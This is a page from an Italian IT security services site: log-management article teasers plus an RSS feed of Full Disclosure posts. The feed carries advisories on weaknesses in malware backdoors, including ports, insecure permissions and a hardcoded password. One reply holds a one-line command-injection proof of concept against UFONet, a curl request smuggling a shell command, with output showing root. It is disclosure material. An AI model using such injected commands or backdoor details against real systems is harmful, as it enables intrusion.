Log Management

Log file management tramite syslog-ng Giacomo Lanzi

Gestione dei Log File con il servizio di Secure Online Desktop

Tempo di lettura: 5 min I sistemi IT producono grandi quantita’ di log file, strumenti utilissimi per garantire la sicurezza dei dati e la stabilita’ delle applicazioni. Pero’, in un ecosistema complesso, la quantita’ di file e la loro posizione, possono diventare due scogli insormontabili da superare, nel caso in cui sia necessario consultare i dati in modo efficiente. Ecco…

syslog server Piergiorgio Venuti

Nuovo servizio | Log Management – Il servizio ad alte prestazione per la conservazioni dei Log

syslog server – Il servizio ad alte prestazione per la conservazioni dei Log Utilizza tutti i punti di forza del syslog-ng Premium Edition Ricerca i log, rendi sicuri i dati sensibili con policy di accesso granulari e genera report Inoltra i log verso strumenti di terze parti   SYSLOG SERVER – SERVIZIO DI LOG MANAGEMENT IN CLOUD PER GESTIRE I…

Condividi


RSS

Piu’ articoli…

Categorie …

Tags

RSS CSIRT

RSS Dark Reading:

RSS Full Disclosure

  • Backdoor.Win32.IRCBot.gen / Unauthenticated Remote Command Execution Luglio 20, 2021
    Posted by malvuln on Jul 20Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/96f5cdfa5b3416c819d76060f11dc88d.txt Contact: malvuln13 () gmail com Media: twitter.com/malvuln Threat: Backdoor.Win32.IRCBot.gen Vulnerability: Unauthenticated Remote Command Execution Description: The malware listens on TCP port 6777. Third-party attackers who can reach infected systems can execute commands. Commands must be wrapped in quotes or...
  • Trojan-Spy.Win32.SpyEyes.hqd / Insecure Permissions Luglio 20, 2021
    Posted by malvuln on Jul 20Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/6f484fea8f6bb3974185fc856f37541b.txt Contact: malvuln13 () gmail com Media: twitter.com/malvuln Threat: Trojan-Spy.Win32.SpyEyes.hqd Vulnerability: Insecure Permissions Description: The malware creates a dir with insecure permissions under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the...
  • Trojan-Spy.Win32.SpyEyes.abdb / Insecure Permissions Luglio 20, 2021
    Posted by malvuln on Jul 20Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/9185538b01ad700603f38fb0eb8b6e3b.txt Contact: malvuln13 () gmail com Media: twitter.com/malvuln Threat: Trojan-Spy.Win32.SpyEyes.abdb Vulnerability: Insecure Permissions Description: The malware creates a dir with insecure permissions under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the...
  • Backdoor.Win32.Agent.bjev / Insecure Permissions Luglio 20, 2021
    Posted by malvuln on Jul 20Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/ca40998b5d62ee7f936537ff3de7993d.txt Contact: malvuln13 () gmail com Media: twitter.com/malvuln Threat: Backdoor.Win32.Agent.bjev Vulnerability: Insecure Permissions Description: The malware creates a dir with insecure permissions under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the...
  • Backdoor.Win32.IRCBot.gen / Weak Hardcoded Password Luglio 20, 2021
    Posted by malvuln on Jul 20Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/9b12ff6b8b025e7fb0a171abad41c79c.txt Contact: malvuln13 () gmail com Media: twitter.com/malvuln Threat: Backdoor.Win32.IRCBot.gen Vulnerability: Weak Hardcoded Password Description: The malware listens on TCP port 13013. Authentication is required for remote user access. However, the password "slimanus" is weak and hardcoded in plaintext...
  • HEUR.Backdoor.Win32.Generic / Unauthenticated Open Proxy Luglio 20, 2021
    Posted by malvuln on Jul 20Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/f2b5429feaa7d229418cf499ce5f5822.txt Contact: malvuln13 () gmail com Media: twitter.com/malvuln Threat: HEUR.Backdoor.Win32.Generic Vulnerability: Unauthenticated Open Proxy Description: The malware listens on TCP ports 1080, 8080. Third-party attackers who can connect to the infected system can relay requests from the original connection to […]
  • HEUR.Backdoor.Win32.Generic / Unauthenticated Open Proxy Luglio 20, 2021
    Posted by malvuln on Jul 20Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/bcf45d515f2a0c6ead1e44ea6371276b.txt Contact: malvuln13 () gmail com Media: twitter.com/malvuln Threat: HEUR.Backdoor.Win32.Generic Vulnerability: Unauthenticated Open Proxy Description: The malware listens on TCP ports 1080, 8080. Third-party attackers who can connect to the infected system can relay requests from the original connection to […]
  • Re: New Release: UFONet v1.7 - "KRäK!eN"... Luglio 20, 2021
    Posted by psy on Jul 20Hi UFOmmander! Hahahaha.... That teleportation technology can be exploited by many alien races in the galaxy, yes, but it will depend a lot on the pilot experiencies and in the environment in which the aircraft has been built. Some use transparent proxies to avoid going further in those techniques... """ […]
  • Multiple vulnerabilities in Dell OpenManage Enterprise Luglio 20, 2021
    Posted by Pierre Kim on Jul 20## Advisory Information Title: Multiple vulnerabilities in Dell OpenManage Enterprise Advisory URL: https://pierrekim.github.io/advisories/2021-dell-openmanage-enterprise-0x00.txt Blog URL: https://pierrekim.github.io/blog/2021-07-19-dell-openmanage-enterprise-0day-vulnerabilities.html Date published: 2021-07-19 Vendors contacted: Dell Release mode: Coordinated-Disclosure CVE: None yet assigned ## Product description Dell EMC OpenManage...
  • Re: [FD] New Release: UFONet v1.7 - "KRäK!eN"... Luglio 20, 2021
    Posted by Pierre Kim on Jul 20Hi, Attention to all motherships, borgs have been detected inside a blackhole. Brace yourself for the impact: $ curl "http://localhost:9999/cmd_download_botnet_ip?blackhole=';id>/tmp/plop;'" $ cat /tmp/plop uid=0(root) gid=0(root) groups=0(root) Energy shield levels critical! Enemies detected on the deck. Immediate response needed! Can you request a CVE ? Best regards, - Captain Alex […]

Customers

Newsletter